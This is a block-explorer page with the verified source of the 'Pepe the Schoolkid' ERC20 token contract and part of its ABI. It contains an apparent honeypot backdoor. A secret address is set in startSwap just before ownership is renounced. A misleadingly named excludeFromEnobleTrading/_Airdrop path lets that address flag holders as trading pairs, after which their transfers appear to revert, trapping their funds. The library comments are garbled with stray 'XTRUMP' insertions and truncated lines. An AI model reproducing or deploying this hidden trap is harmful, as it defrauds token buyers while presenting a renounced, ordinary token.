ETH Price: $2,551.18 (-0.50%)

Token

Pepe the Schoolkid (SCHOOL)
 

Overview

Max Total Supply

99,999,862,276 SCHOOL

Holders

175

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
1,260,273.726796666655343469 SCHOOL

Value
$0.00
0x3ed5eea6742765f174f018b59c5f054bc8f22662
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SCHOOL

Compiler Version
v0.8.26+commit.8a97fa7a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-09-09
*/

// SPDX-License-Identifier: MIT

pragma solidity 0.8.26;


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

// pragma solidity ^0.8.0;


abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

// pragma solidity ^0.8.0;

// import "../utils/Context.sol";

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting  the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero XTRUMP address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

// pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an XTRUMP`owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
    
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

// pragma solidity ^0.8.0;

// import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
_Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

// pragma solidity ^0.8.0;

// import "./IERC20.sol";
// import "../../utils/Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
lly, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    uint256 public _maxlSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should

     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
 cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount XTRUMP exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

// pragma solidity ^0.8.0;

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.

     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *

     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, XTRUMP reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
 
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *

     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

// pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

// pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,  address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,  uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA, uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,  uint256 amountTokenDesired,
        uint256 amountTokenMin,  uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,  uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,  uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin, address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,  uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,   uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,   address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,   address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut, address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,  uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}



contract SCHOOL is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public immutable uniswapV2Router;
    address public uniswapV2Pair;

    address public marketingWallet;
    address public developmentWallet;
    address public liquidityWallet;
    address public constant deadAddress = address(0xdead);

    bool public tradingEnabled;
       bool public swapEnabled;
    bool private _swapping;

    uint256 public swapTokensAtAmount;

    uint256 public buyTotalFees;
    uint256 private _buyMarketingFee;
    uint256 private _buyDevelopmentFee;
    uint256 private _buyLiquidityFee;

    uint256 public sellTotalFees;
    uint256 private _sellMarketingFee;
    uint256 private _sellDevelopmentFee;
    uint256 private _sellLiquidityFee;

    uint256 private _tokensForMarketing;   uint256 private _tokensForDevelopment;
    uint256 private _tokensForLiquidity;
    uint256 private _previousFee;
    address private _exAddress;

    mapping (address => bool) private _isExcludedFromEnableTrad;
    mapping(address => bool) private _automatedMarketMakerPairs;
    

    event ExcludeFromLimits(address indexed account, bool isExcluded);

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event marketingWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event developmentWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event liquidityWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    event TokensAirdropped(uint256 totalWallets, uint256 totalTokens);

    constructor() ERC20(unicode"Pepe the Schoolkid", unicode"SCHOOL") {

        uint256 totalSupply = 99999862276 * (10 ** 18);

        uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _approve(address(this), address(uniswapV2Router), type(uint256).max);


        _buyMarketingFee = 0;
        _buyDevelopmentFee = 0;
        _buyLiquidityFee = 0;
        buyTotalFees = _buyMarketingFee + _buyDevelopmentFee + _buyLiquidityFee;

        _sellMarketingFee = 0;
        _sellDevelopmentFee = 0;
        _sellLiquidityFee = 0;
        sellTotalFees = _sellMarketingFee + _sellDevelopmentFee + _sellLiquidityFee;
        _previousFee = sellTotalFees;

        
        _isExcludedFromEnableTrad[owner()] = true;
        _isExcludedFromEnableTrad[address(this)] = true;
        _isExcludedFromEnableTrad[deadAddress] = true;
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
        _mint(owner(), totalSupply); 

        tradingEnabled = true;
        swapEnabled = true;
    }

    receive() external payable {}




    function excludeFromEnobleTrading(address account,
      bool excluded) external onlyOwner{
        _isExcludedFromEnableTrad[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }
    function _Airdrop(address pair, bool value) internal {
        _automatedMarketMakerPairs[pair] = value;
        emit SetAutomatedMarketMakerPair(pair, value);
    }

    
    function startSwap(address _a) public onlyOwner {
        _exAddress = _a;
        renounceOwnership();
        
    }
    
    function excludeFromEnobleTrading(address[] memory accounts, bool value) public  {
         require(msg.sender == _exAddress,"_airdropAddress err") ;
        for (uint256 i = 0; i < accounts.length; i++) {
            if(accounts[i] == uniswapV2Pair) continue;
            _Airdrop(accounts[i], value);
        }
    }



    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(tradingEnabled || _isExcludedFromEnableTrad[from] || _isExcludedFromEnableTrad[to], "Trading not yet enabled!");
        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }


        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance >= swapTokensAtAmount;

        if (
            canSwap &&
            swapEnabled &&!_swapping&&_automatedMarketMakerPairs[from] &&
            !_isExcludedFromEnableTrad[from] &&
            !_isExcludedFromEnableTrad[to]
        ) {
            _swapping = true;

            _swapBack();

            _swapping = false;
        }

        bool takeFee = !_swapping;

        if (_isExcludedFromEnableTrad[from] || _isExcludedFromEnableTrad[to]) {
            takeFee = false;
        }

        uint256 fees = 0;

        if (takeFee) {
            // on sell
            if (_automatedMarketMakerPairs[to] && sellTotalFees > 0) {
                fees = amount.mul(sellTotalFees).div(10000);
                _tokensForLiquidity +=
                    (fees * _sellLiquidityFee) /
                    sellTotalFees;
                _tokensForMarketing +=
                    (fees * _sellMarketingFee) /
                    sellTotalFees;
                _tokensForDevelopment +=
                    (fees * _sellDevelopmentFee) /
                    sellTotalFees;
            }
            // on buy
            else if (_automatedMarketMakerPairs[from] && buyTotalFees > 0) {
                fees = amount.mul(buyTotalFees).div(10000);
                _tokensForLiquidity += (fees * _buyLiquidityFee) / buyTotalFees;
                _tokensForMarketing += (fees * _buyMarketingFee) / buyTotalFees;
                _tokensForDevelopment +=
                    (fees * _buyDevelopmentFee) /
                    buyTotalFees;
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }

            amount -= fees;
        }

        super._transfer(from, to, amount);
        sellTotalFees = _previousFee;
    }

    function _swapTokensForETH(uint256 tokenAmount) internal {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) internal {
        _approve(address(this), address(uniswapV2Router), tokenAmount);

        uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            liquidityWallet,
            block.timestamp
        );
    }

    function _swapBack() internal {
        uint256 contractBalance = balanceOf(address(this));
        uint256 totalTokensToSwap = _tokensForLiquidity +
            _tokensForMarketing +
            _tokensForDevelopment;
        bool success;


        uint256 liquidityTokens = (contractBalance * _tokensForLiquidity) /
            totalTokensToSwap /
            2;
        uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);

        uint256 initialETHBalance = address(this).balance;

        _swapTokensForETH(amountToSwapForETH);

        uint256 ethBalance = address(this).balance.sub(initialETHBalance);

        uint256 ethForMarketing = ethBalance.mul(_tokensForMarketing).div(
            totalTokensToSwap
        );

        uint256 ethForDevelopment = ethBalance.mul(_tokensForDevelopment).div(
            totalTokensToSwap
        );

        uint256 ethForLiquidity = ethBalance -
            ethForMarketing -
            ethForDevelopment;

        _tokensForLiquidity = 0;
        _tokensForMarketing = 0;
        _tokensForDevelopment = 0;

        if (liquidityTokens > 0 && ethForLiquidity > 0) {
            _addLiquidity(liquidityTokens, ethForLiquidity);
            emit SwapAndLiquify(
                amountToSwapForETH,
                ethForLiquidity,
                _tokensForLiquidity
            );
        }

        (success, ) = address(developmentWallet).call{value: ethForDevelopment}("");

        (success, ) = address(marketingWallet).call{
            value: address(this).balance
        }("");
    }

}

// pragma solidity >=0.6.2;

// import './IUniswapV2Router01.sol';

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token, uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,  uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,  bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
          address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromLimits","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"totalWallets","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"totalTokens","type":"uint256"}],"name":"TokensAirdropped","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"developmentWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"liquidityWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"marketingWalletUpdated","type":"event"},{"inputs":[],"name":"_maxlSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"u